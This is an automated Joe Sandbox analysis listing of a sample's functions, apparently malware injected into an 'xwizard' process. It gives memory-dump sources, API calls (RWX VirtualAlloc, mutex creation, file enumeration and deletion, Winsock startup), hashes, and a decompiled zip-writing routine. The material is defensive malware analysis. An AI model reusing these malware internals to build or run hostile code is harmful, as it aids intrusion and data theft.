g, xrefs: 00CC04B5
^, xrefs: 00CC04D5
W, xrefs: 00CC0489
j, xrefs: 00CC044E

Memory Dump Source

Source File: 0000001E.00000002.688515806.0000000000CC0000.00000040.00000001.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_cc0000_xwizard.jbxd

Similarity

API ID: AllocVirtual
String ID: #$$$$$$$3$D$H$H$H$M$U$V$W$]$^$_$f$g$g$g$j$u$}
API String ID: 4275171209-407550641
Opcode ID: 446a2ac3f0bdeb76d4d21a5fba3ebfaa66e4da1ca3b65b8f0998a2a731f0a977
Instruction ID: 5729ea664f9e6f88de1309cbc9e2881a5d076ded8d4fabacf85d3b107e6db57f
Opcode Fuzzy Hash: 446a2ac3f0bdeb76d4d21a5fba3ebfaa66e4da1ca3b65b8f0998a2a731f0a977
Instruction Fuzzy Hash: C051AE1194D7C9D9DF22C6FC98487DEBF711F27224F480289E5E43B2D2C2A9050AD7BA

Uniqueness

Uniqueness Score: -1.00%

Function 00CC02F2, Relevance: 28.6, APIs: 1, Strings: 18, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,0000003E,00003000,00000040), ref: 00CC03FB

Strings

H, xrefs: 00CC034A
g, xrefs: 00CC0377
}, xrefs: 00CC036F
j, xrefs: 00CC0318
3, xrefs: 00CC031C
f, xrefs: 00CC03C8
%, xrefs: 00CC0356
e, xrefs: 00CC0346
$, xrefs: 00CC03BC
`, xrefs: 00CC035A
H, xrefs: 00CC037B
g, xrefs: 00CC0367
], xrefs: 00CC03E4
U, xrefs: 00CC02FB
D, xrefs: 00CC039B
$, xrefs: 00CC033A
#, xrefs: 00CC03A7
$, xrefs: 00CC039F

Memory Dump Source

Source File: 0000001E.00000002.688515806.0000000000CC0000.00000040.00000001.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_cc0000_xwizard.jbxd

Similarity

API ID: AllocVirtual
String ID: #$$$$$$$%$3$D$H$H$U$]$`$e$f$g$g$j$}
API String ID: 4275171209-212034420
Opcode ID: 78a40c36d6233135ad61ce59d6e5b2db63f2a8a0c6cf342b01b91a694debbb98
Instruction ID: cc50465eb899ad473cb04e20c2b810918974f5581ca0ac3fe07ff329ab8e1586
Opcode Fuzzy Hash: 78a40c36d6233135ad61ce59d6e5b2db63f2a8a0c6cf342b01b91a694debbb98
Instruction Fuzzy Hash: 1051AF11D4D7C9D9DB22C2FC98587DEAF711F37224F584289E5E03B2D2C6A50609D37A

Uniqueness

Uniqueness Score: -1.00%

Function 00CC1706, Relevance: 6.1, APIs: 4, Instructions: 72
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,?,?,00CC131C), ref: 00CC172B
CreateFileMappingW.KERNELBASE(00000000,00000000,01000002,00000000,00000000,00000000,00000000,?,00CC131C), ref: 00CC174D

Memory Dump Source

Source File: 0000001E.00000002.688515806.0000000000CC0000.00000040.00000001.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_cc0000_xwizard.jbxd

Similarity

API ID: CreateFile$Mapping
String ID:
API String ID: 2428082958-0
Opcode ID: 11a8cb569d0941fe68267423b06c431235959936bbd495daaa5b2d21cf56c0e2
Instruction ID: e936c2d65caa39a661b8b4b6f9c3b20039c5fae24bbd867b445324efecc85848
Opcode Fuzzy Hash: 11a8cb569d0941fe68267423b06c431235959936bbd495daaa5b2d21cf56c0e2
Instruction Fuzzy Hash: 9E018050740619BEEA9272BA8CC2F7F609D8FD6795F28016CFD26F2182DE644E012371

Uniqueness

Uniqueness Score: -1.00%

Function 00408FE0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 156
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00407C77: GetModuleFileNameW.KERNEL32 ref: 00407CA2
Part of subcall function 00407C77: WideCharToMultiByte.KERNEL32 ref: 00407CE3

Part of subcall function 00412D73: getenv.MSVCRT ref: 00412ECA

ExitProcess.KERNEL32 ref: 00409134
fopen.MSVCRT ref: 00409237

Part of subcall function 00406E04: MultiByteToWideChar.KERNEL32 ref: 00406E3D
Part of subcall function 00406E04: GetFileAttributesW.KERNEL32 ref: 00406E48
Part of subcall function 00406E04: SetFileAttributesW.KERNEL32 ref: 00406E62
Part of subcall function 00406E04: DeleteFileW.KERNEL32 ref: 00406E6C

Part of subcall function 00406F1A: MultiByteToWideChar.KERNEL32 ref: 00406F53
Part of subcall function 00406F1A: GetFileAttributesW.KERNEL32 ref: 00406F5E

Part of subcall function 00407EF4: Sleep.KERNEL32 ref: 00407EFE

Strings

r0B, xrefs: 004090AB

Memory Dump Source

Source File: 0000001E.00000002.688349091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.688332604.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000001E.00000002.688394318.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688411345.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000001E.00000002.688427164.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688435117.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688441529.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: File$AttributesByteCharMultiWide$DeleteExitModuleNameProcessSleepfopengetenv
String ID: r0B
API String ID: 3425440891-4020269923
Opcode ID: f30e6d8a907dd3353848ff06e92ddf989b88db033d35ce3d89f40ddf47fb2e6e
Instruction ID: cf1332e757baf714fb04fabdc2a14f291af18396ddc48b811abeeedaa7cc8274
Opcode Fuzzy Hash: f30e6d8a907dd3353848ff06e92ddf989b88db033d35ce3d89f40ddf47fb2e6e
Instruction Fuzzy Hash: 4D61C7B04087119AD710BF61D64536EBBE1AF81348F41C86EE4C86B383CBBD8985DB5B

Uniqueness

Uniqueness Score: -1.00%

Function 00408AB3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexA.KERNEL32(?,?,?,?,?,?,?,00409119), ref: 00408ACD
GetLastError.KERNEL32 ref: 00408AE0

Strings

d%B, xrefs: 00408AB6

Memory Dump Source

Source File: 0000001E.00000002.688349091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.688332604.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000001E.00000002.688394318.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688411345.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000001E.00000002.688427164.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688435117.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688441529.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: CreateErrorLastMutex
String ID: d%B
API String ID: 1925916568-3233696437
Opcode ID: c3194e90da334e6e38a89a9e3cd57681737c8a67fcd2182493c3a531e1f22581
Instruction ID: ad06f29d9f34d8de5c37fb948c6dfac14eb5c16bc83129ba4182c5028b8a9bce
Opcode Fuzzy Hash: c3194e90da334e6e38a89a9e3cd57681737c8a67fcd2182493c3a531e1f22581
Instruction Fuzzy Hash: FED05EB4504701AAD714FF2982453993EE05B40308F84843EDC88C3796E3BD81DD8B1B

Uniqueness

Uniqueness Score: -1.00%

Function 00405959, Relevance: 4.5, APIs: 3, Instructions: 16
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32 ref: 0040596E
ExitProcess.KERNEL32 ref: 00405980
InitializeCriticalSection.KERNEL32 ref: 0040598C

Memory Dump Source

Source File: 0000001E.00000002.688349091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.688332604.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000001E.00000002.688394318.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688411345.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000001E.00000002.688427164.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688435117.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688441529.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: CriticalExitInitializeProcessSectionStartup
String ID:
API String ID: 3456047655-0
Opcode ID: a91f1f4c0aaa6fb794749ee6afa9b0a47610891d014f0b90db03d96409f36a12
Instruction ID: 24ad92727fe000e7c60640d94de1f7f21ee868b5df478abe0a14dc0806b9406b
Opcode Fuzzy Hash: a91f1f4c0aaa6fb794749ee6afa9b0a47610891d014f0b90db03d96409f36a12
Instruction Fuzzy Hash: A4D012F0504301AEE710BF51D4057BA7AE8AB41310F41483EA8D086242D77D448D4AA7

Uniqueness

Uniqueness Score: -1.00%

Function 00CC06E2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDiskFreeSpaceExA.KERNELBASE(C:\,00000000,?,00000000), ref: 00CC0715

Strings

C:\, xrefs: 00CC0711, 00CC0714

Memory Dump Source

Source File: 0000001E.00000002.688515806.0000000000CC0000.00000040.00000001.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_cc0000_xwizard.jbxd

Similarity

API ID: DiskFreeSpace
String ID: C:\
API String ID: 1705453755-3404278061
Opcode ID: d5a6d4ecf3d2871be30a7d4c171c207394f87c03fb417a21a7da664a344604cb
Instruction ID: 8e243da4b4dc9306afa6285f3f44a3c0c6e5efc667b8564222f258b7af53fe5c
Opcode Fuzzy Hash: d5a6d4ecf3d2871be30a7d4c171c207394f87c03fb417a21a7da664a344604cb
Instruction Fuzzy Hash: 7BF08972904209EBEF15A6E4CC96FEF737CAB00344F24046DD51256141E970EB459B61

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0041D049, Relevance: 25.0, APIs: 11, Strings: 3, Instructions: 453
fileCOMMONCrypto

Download Yara Rule

C-Code - Quality: 15%

			E0041D049(signed int __ecx, signed int __edx, intOrPtr* _a4, signed int _a8, char* _a12, char* _a16, signed short _a20, signed char _a24, intOrPtr _a28) {
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v42;
				char _v46;
				char _v50;
				char _v51;
				unsigned short _v52;
				char _v53;
				unsigned short _v54;
				char _v56;
				char _v60;
				char _v61;
				char _v62;
				char _v63;
				void _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				char _v92;
				signed short _v94;
				signed short _v96;
				signed short _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed short _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				void* _v164;
				signed int _v168;
				intOrPtr _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				intOrPtr _v208;
				void* _v212;
				signed int _v216;
				signed short _v220;
				signed int _v224;
				signed int _v228;
				void* _v232;
				signed char _t265;
				signed short _t270;
				char* _t282;
				struct _IO_FILE* _t286;
				signed int _t289;
				signed int _t294;
				signed int _t295;
				void* _t304;
				signed int _t316;
				void* _t332;
				signed int _t344;
				signed int _t347;
				signed int _t349;
				signed int _t355;
				int _t358;
				void* _t367;
				signed int _t369;
				signed int _t371;
				int _t376;
				void* _t379;
				char* _t381;
				void* _t392;
				char* _t393;
				unsigned short _t394;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t410;
				signed int _t417;
				unsigned short _t422;
				signed int _t441;
				char* _t447;
				signed int _t448;
				void* _t449;
				signed int _t451;
				char _t452;
				signed int _t453;
				signed int _t454;
				void* _t455;
				char** _t456;

				_t410 = __edx;
				_t397 = __ecx;
				_t456 = _t455 - 0xdc;
				_t449 = _a4;
				_v96 = 0;
				_v94 = 0;
				_v112 = _a20;
				_t265 = _a24;
				if(_t265 < 0) {
					_t265 = 6;
				}
				if(_t449 == 0 ||  *((intOrPtr*)(_t449 + 0x48)) == 0 ||  *((intOrPtr*)(_t449 + 0x14)) != 2 || _a8 == 0) {
					L17:
					_t441 = 0;
					goto L61;
				} else {
					_t451 = _t265 & 0x0000000f;
					_t398 = _t397 & 0xffffff00 | _v112 != 0x00000000;
					if((_t398 & (_t410 & 0xffffff00 | _a16 == 0x00000000)) == 0 && _t451 - 0xa > 0 <= 0 && (_t265 & 0x00000004) == 0 && E00414919(_a8) != 0) {
						asm("repne scasb");
						_t270 =  !(_t398 | 0xffffffff) - 1;
						_v140 = _t270;
						if(_t270 > 0xffff) {
							goto L17;
						}
						_t392 = E0041493A(_t449);
						if( *(_t449 + 0x10) == 0xffff) {
							goto L17;
						}
						_v144 = 0;
						_v164 =  *_t449;
						_v160 =  *((intOrPtr*)(_t449 + 4));
						asm("adc edx, [esp+0x4c]");
						_v124 = _t392 + _v164;
						_v120 = 0;
						_v148 = _v140;
						asm("adc edx, 0x0");
						asm("adc edx, [esp+0x5c]");
						asm("adc edx, [esp+0x74]");
						if(0 > 0) {
							goto L17;
						}
						_v232 =  &_v64;
						_t282 = _a12;
						 *_t456 = _t282;
						L0041F7B4();
						if(_t282 != 0) {
							goto L17;
						}
						E00415FC6(_v36,  &_v94,  &_v96);
						_v232 = 0x424983;
						 *_t456 = _a12;
						_t286 = fopen(??, ??);
						_v168 = _t286;
						if(_t286 == 0) {
							goto L17;
						}
						_v228 = 2;
						_v232 = 0;
						 *_t456 = _t286;
						fseek(??, ??, ??);
						 *_t456 = _v168;
						_t289 = ftell(??);
						_v136 = _t289;
						_v156 = _t289;
						_v152 = _t289 >> 0x1f;
						_v228 = 0;
						_v232 = 0;
						 *_t456 = _v168;
						fseek(??, ??, ??);
						if(_v152 <= 0) {
							__eflags = _v136 - 3;
							if(__eflags <= 0) {
								_t451 = 0;
								__eflags = 0;
							}
							_t393 = _t392 + 0x1e;
							 *_t456 = _t393;
							_t294 = E00414DC1(_t449, _v160, _v164, __eflags);
							__eflags = _t294;
							_t441 = _t294;
							if(_t294 != 0) {
								_t417 =  *(_t449 + 0x24);
								_t295 =  *(_t449 + 0x20);
								__eflags = _t417 | _t295;
								if((_t417 | _t295) != 0) {
									asm("adc edx, 0xffffffff");
									__eflags = _t417 & _v120 | _t295 + 0xffffffff & _v124;
									if((_t417 & _v120 | _t295 + 0xffffffff & _v124) != 0) {
										_v228 = 0x18d6;
										_v232 = 0x424620;
										 *_t456 = "(local_dir_header_ofs & (pZip->m_file_offset_alignment - 1)) == 0";
										L0041F7E4();
									}
								}
								asm("adc edx, [esp+0x4c]");
								_v164 =  &(_t393[_v164]);
								_v160 = 0;
								memset( &_v64, 0, 0x1e << 0);
								_t456 =  &(_t456[3]);
								_v228 = _v160;
								_v220 = _v140;
								_v224 = _a8;
								_v232 = _v164;
								 *_t456 =  *(_t449 + 0x44);
								_t304 =  *((intOrPtr*)(_t449 + 0x3c))();
								__eflags = _v140 - _t304;
								if(_v140 != _t304) {
									goto L16;
								} else {
									asm("adc edx, [esp+0x4c]");
									_v148 = _v164 + _v148;
									__eflags = _v136 | _v152;
									if((_v136 | _v152) == 0) {
										_t452 = 0;
										__eflags = 0;
										_v164 = 0;
										_v132 = _v136;
										_v116 = _v152;
										L56:
										 *_t456 = _v168;
										fclose(??);
										__eflags = _v116;
										if(_v116 > 0) {
											goto L17;
										}
										__eflags = _v144;
										if(_v144 > 0) {
											goto L17;
										}
										_t422 = _v94;
										__eflags = _t452 - 1;
										_t394 = _v96;
										_t316 = memset( &_v64, 0, 0x1e << 0);
										_t456 =  &(_t456[3]);
										asm("sbb eax, eax");
										_v52 = _t422;
										_v51 = _t422 >> 8;
										_v54 = _t394;
										_v60 =  !_t316 & 0x00000014;
										_v64 = 0x50;
										_v56 = _t452;
										_v63 = 0x4b;
										_v62 = 3;
										_v61 = 4;
										_v53 = _t394 >> 8;
										E00414900( &_v50, _v164);
										E00414900( &_v46, _v132);
										E00414900( &_v42, _v136);
										_v220 = 0x1e;
										_v36 = 0;
										_v35 = 0;
										_v38 = _v140;
										_v228 = _v120;
										_v37 = _v140 >> 8;
										_v224 =  &_v64;
										_v232 = _v124;
										 *_t456 =  *(_t449 + 0x44);
										_t332 =  *((intOrPtr*)(_t449 + 0x3c))();
										__eflags = _t332 - 0x1e;
										if(_t332 != 0x1e) {
											goto L17;
										}
										_v208 = _t452;
										_v188 = _a28;
										_v192 = _v120;
										_v196 = _v124;
										_v224 = _v152;
										_v200 = _v94 & 0x0000ffff;
										_v204 = _v96 & 0x0000ffff;
										_v212 = _v164;
										_v220 = _v132;
										_v216 = _v116;
										_v228 = _v156;
										_v232 = _v112 & 0x0000ffff;
										 *_t456 = _a16;
										_t344 = E00416311(_t449, _v140 & 0x0000ffff, _a8);
										__eflags = _t344;
										if(_t344 == 0) {
											goto L17;
										}
										_t441 = 1;
										_t261 = _t449 + 0x10;
										 *_t261 =  *(_t449 + 0x10) + 1;
										__eflags =  *_t261;
										 *_t449 = _v148;
										 *((intOrPtr*)(_t449 + 4)) = _v144;
										goto L61;
									}
									_v228 = 0x10000;
									_v232 = 1;
									 *_t456 =  *(_t449 + 0x34);
									_t347 =  *((intOrPtr*)(_t449 + 0x28))();
									__eflags = _t347;
									_t396 = _t347;
									if(_t347 == 0) {
										goto L16;
									}
									__eflags = _t451;
									if(_t451 != 0) {
										_v228 = 0x4df40;
										_v232 = 1;
										 *_t456 =  *(_t449 + 0x34);
										_t349 =  *((intOrPtr*)(_t449 + 0x28))();
										__eflags = _t349;
										_t447 = _t349;
										if(_t349 == 0) {
											L52:
											_v232 = _t396;
											 *_t456 =  *(_t449 + 0x34);
											 *((intOrPtr*)(_t449 + 0x2c))();
											goto L16;
										}
										_v228 = 0;
										_v232 = 0xfffffff1;
										 *_t456 = _t451;
										_v92 = _t449;
										_v80 = _v144;
										_v84 = _v148;
										_v76 = 0;
										_v72 = 0;
										_v224 = E0041A99E();
										_v232 = E00416018;
										 *_t456 = _t447;
										_v228 =  &_v92;
										_t355 = E0041A64C();
										__eflags = _t355;
										if(_t355 == 0) {
											_v164 = 0;
											_v148 = _v156;
											_v144 = _v152;
											do {
												__eflags = _v144;
												if(_v144 > 0) {
													L45:
													_t453 = 0x10000;
													L46:
													_v228 = _t453;
													_v232 = 1;
													 *_t456 = _t396;
													_v224 = _v168;
													_t358 = fread(??, ??, ??, ??);
													__eflags = _t453 - _t358;
													if(_t453 != _t358) {
														break;
													}
													_v228 = _t453;
													_v232 = _t396;
													 *_t456 = _v164;
													_t367 = E004171DA();
													_v148 = _v148 - _t453;
													_v164 = _t367;
													asm("sbb [esp+0x5c], edx");
													_v228 = _t453;
													_t369 = _v144 | _v148;
													_v232 = _t396;
													 *_t456 = _t447;
													__eflags = _t369 - 1;
													asm("sbb eax, eax");
													_v224 = _t369 & 0x00000004;
													_t371 = E0041A5F0();
													__eflags = _t371 - 1;
													if(_t371 == 1) {
														_t454 = 1;
														L51:
														_v232 = _t447;
														 *_t456 =  *(_t449 + 0x34);
														 *((intOrPtr*)(_t449 + 0x2c))();
														__eflags = _t454;
														if(_t454 != 0) {
															_t452 = 8;
															_v132 = _v76;
															_v144 = _v80;
															_v116 = _v72;
															_v148 = _v84;
															L54:
															_v232 = _t396;
															 *_t456 =  *(_t449 + 0x34);
															 *((intOrPtr*)(_t449 + 0x2c))();
															goto L56;
														}
														goto L52;
													}
													goto L48;
												}
												__eflags = _v148 - 0xffff;
												if(_v148 > 0xffff) {
													goto L45;
												}
												_t453 = _v148;
												goto L46;
												L48:
												__eflags = _t371;
											} while (_t371 == 0);
											_t454 = 0;
											goto L51;
										}
										_v232 = _t447;
										 *_t456 =  *(_t449 + 0x34);
										 *((intOrPtr*)(_t449 + 0x2c))();
										goto L52;
									}
									_v164 = 0;
									_v132 = _v156;
									_v128 = _v152;
									do {
										__eflags = _v128;
										if(_v128 > 0) {
											L33:
											_t448 = 0x10000;
											L34:
											_v228 = _t448;
											_v232 = 1;
											 *_t456 = _t396;
											_v224 = _v168;
											_t376 = fread(??, ??, ??, ??);
											__eflags = _t448 - _t376;
											if(_t448 != _t376) {
												goto L52;
											}
											_v220 = _t448;
											_v224 = _t396;
											_v232 = _v148;
											_v228 = _v144;
											 *_t456 =  *(_t449 + 0x44);
											_t379 =  *((intOrPtr*)(_t449 + 0x3c))();
											__eflags = _t448 - _t379;
											if(_t448 != _t379) {
												goto L52;
											}
											goto L36;
										}
										__eflags = _v132 - 0x10000;
										if(_v132 > 0x10000) {
											goto L33;
										}
										_t448 = _v132;
										goto L34;
										L36:
										_v228 = _t448;
										_v232 = _t396;
										 *_t456 = _v164;
										_t381 = E004171DA();
										_v132 = _v132 - _t448;
										_v164 = _t381;
										asm("sbb [esp+0x6c], edx");
										_v148 = _v148 + _t448;
										asm("adc [esp+0x5c], edx");
										__eflags = _v128 | _v132;
									} while ((_v128 | _v132) != 0);
									_t452 = 0;
									_v132 = _v136;
									_v116 = _v152;
									goto L54;
								}
							} else {
								 *_t456 = _v168;
								fclose(??);
								L61:
								return _t441;
							}
						}
						L16:
						 *_t456 = _v168;
						fclose(??);
					}
					goto L17;
				}
			}

APIs

_stat.MSVCRT ref: 0041D1A1
fopen.MSVCRT ref: 0041D1DA
fseek.MSVCRT ref: 0041D1FA
ftell.MSVCRT ref: 0041D206
fseek.MSVCRT ref: 0041D231
fclose.MSVCRT ref: 0041D244

Strings

K, xrefs: 0041D698
FB, xrefs: 0041D2AB
P, xrefs: 0041D682

Memory Dump Source

Source File: 0000001E.00000002.688349091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.688332604.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000001E.00000002.688394318.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688411345.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000001E.00000002.688427164.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688435117.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688441529.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: fseek$_statfclosefopenftell
String ID: FB$K$P
API String ID: 2614710449-1627385504
Opcode ID: 54049fe808654b227bba1578e1d34335061ffaf98f8a99cde8e77accde8bca1c
Instruction ID: 2f0101dfcf5e0978000162e92f0ac79abf139ad8f29847253f420d5a98adee70
Opcode Fuzzy Hash: 54049fe808654b227bba1578e1d34335061ffaf98f8a99cde8e77accde8bca1c
Instruction Fuzzy Hash: 67229FB4A087818FD720DF69C18479BFBE1AF89744F10892EE9D887350E779D885CB46

Uniqueness

Uniqueness Score: -1.00%

Function 00406453, Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 204filetimeCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00406492
SetErrorMode.KERNEL32 ref: 004064A1
FindFirstFileW.KERNEL32 ref: 004064B5
FileTimeToSystemTime.KERNEL32 ref: 00406547
WideCharToMultiByte.KERNEL32 ref: 00406617
FindNextFileW.KERNEL32 ref: 00406745
FindClose.KERNEL32 ref: 00406757

Part of subcall function 00405D7D: EnterCriticalSection.KERNEL32 ref: 00405DAD
Part of subcall function 00405D7D: LeaveCriticalSection.KERNEL32 ref: 00405ECC

Part of subcall function 00407F59: free.MSVCRT ref: 00407F6A

Strings

"B, xrefs: 00406675
, xrefs: 00406568
%.2d/%.2d/%d %.2d:%.2d:%.2d, xrefs: 00406534

Memory Dump Source

Source File: 0000001E.00000002.688349091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.688332604.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000001E.00000002.688394318.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688411345.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000001E.00000002.688427164.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688435117.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688441529.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: FileFind$ByteCharCriticalMultiSectionTimeWide$CloseEnterErrorFirstLeaveModeNextSystemfree
String ID: $%.2d/%.2d/%d %.2d:%.2d:%.2d$"B
API String ID: 2473485750-57038091
Opcode ID: 3a87355c9401e98f2b6dd8472ebd5ff4394208b68e8698201d5d1cc5e3771088
Instruction ID: 4c70007c882a7ce573aae617e01390b0b466164858f4fbbb4a898ac5e72415b9
Opcode Fuzzy Hash: 3a87355c9401e98f2b6dd8472ebd5ff4394208b68e8698201d5d1cc5e3771088
Instruction Fuzzy Hash: 36A1B2B48087459FD710EF25C18469BBBE4BF84714F01892EF8D897391D7789589CF86

Uniqueness

Uniqueness Score: -1.00%

Function 0040680D, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 168fileCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32 ref: 00406824
MultiByteToWideChar.KERNEL32 ref: 0040685F
wcscat.MSVCRT ref: 00406872
FindFirstFileW.KERNEL32 ref: 00406885
FindClose.KERNEL32 ref: 004068B2
WideCharToMultiByte.KERNEL32 ref: 00406924
FindNextFileW.KERNEL32 ref: 00406AB7

Strings

"B, xrefs: 004069A4
;/B, xrefs: 00406A5F
8/B, xrefs: 004068D5

Memory Dump Source

Source File: 0000001E.00000002.688349091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.688332604.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000001E.00000002.688394318.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688411345.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000001E.00000002.688427164.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688435117.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688441529.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: Find$ByteCharFileMultiWide$CloseErrorFirstModeNextwcscat
String ID: 8/B$;/B$"B
API String ID: 1999808103-785463125
Opcode ID: f1dd5b59dd90e2cd6b86d21233615770f5833fe61e03e8d61d53419095457b90
Instruction ID: 3ec7505ef3af3f69d728aa0d249a2e56fce710592115df83b66c59d2158606e8
Opcode Fuzzy Hash: f1dd5b59dd90e2cd6b86d21233615770f5833fe61e03e8d61d53419095457b90
Instruction Fuzzy Hash: CB8102B06093419FD320EF25C18469BBBE4BF85348F45882EE4C997381D7B89589CF87

Uniqueness

Uniqueness Score: -1.00%

Function 00420420, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 217COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 00420557
_assert.MSVCRT ref: 004206E6

Strings

o, xrefs: 004206CF
jB, xrefs: 004206D7

Memory Dump Source

Source File: 0000001E.00000002.688349091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.688332604.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000001E.00000002.688394318.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688411345.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000001E.00000002.688427164.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688435117.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688441529.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: _assert
String ID: jB$o
API String ID: 1222420520-209914815
Opcode ID: c778598c57938beeda3a03c633ed9cdd53ae4a03349816565a6a334ef414175d
Instruction ID: 3ee2903d3d2c0e63440c59b9d95d43c21fe2c472ea4d5dc2fd0c85ac53de4ac0
Opcode Fuzzy Hash: c778598c57938beeda3a03c633ed9cdd53ae4a03349816565a6a334ef414175d
Instruction Fuzzy Hash: BB919E72A083628FC714CF29D48051AFBE2BFD8314F498A2EE8D59B355D735E945CB82

Uniqueness

Uniqueness Score: -1.00%

Function 004208C0, Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 485COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 00420C90
_assert.MSVCRT ref: 00420F11

Strings

HjB, xrefs: 00420F02

Memory Dump Source

Source File: 0000001E.00000002.688349091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.688332604.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000001E.00000002.688394318.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000001E.00000002.688411345.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000001E.00000002.688427164.000000000042B000.00000004.00020000.sdmp Download File
